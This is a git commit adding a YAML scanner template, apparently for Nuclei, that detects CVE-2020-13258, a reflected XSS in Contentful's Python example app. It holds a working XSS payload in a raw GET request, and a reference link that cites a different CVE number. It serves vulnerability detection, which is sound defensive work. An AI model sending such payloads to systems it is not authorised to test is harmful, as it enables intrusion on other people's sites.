Merge pull request #3496 from pikpikcu/patch-314

Added CVE-2020-13258
2022-09-08 16:14:19 +05:30 · 2022-09-08 16:14:19 +05:30 · d95c92dde2
parent d2795a9fe8 2e48394c50
commit d95c92dde2
1 changed files with 35 additions and 0 deletions
--- a/cves/2020/CVE-2020-13258.yaml
+++ b/cves/2020/CVE-2020-13258.yaml
@ -0,0 +1,35 @@
+id: CVE-2020-13258
+
+info:
+  name: Contentful - Reflected XSS
+  author: pikpikcu
+  severity: medium
+  description: |
+    Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py.
+  reference:
+    - https://github.com/contentful/the-example-app.py/issues/44
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
+  tags: cve,cve2020,contentful,xss
+
+requests:
+  - raw:
+      - |
+        GET /?cda'"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "{'api': '"
+          - "</script><script>alert(document.domain)</script>',"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200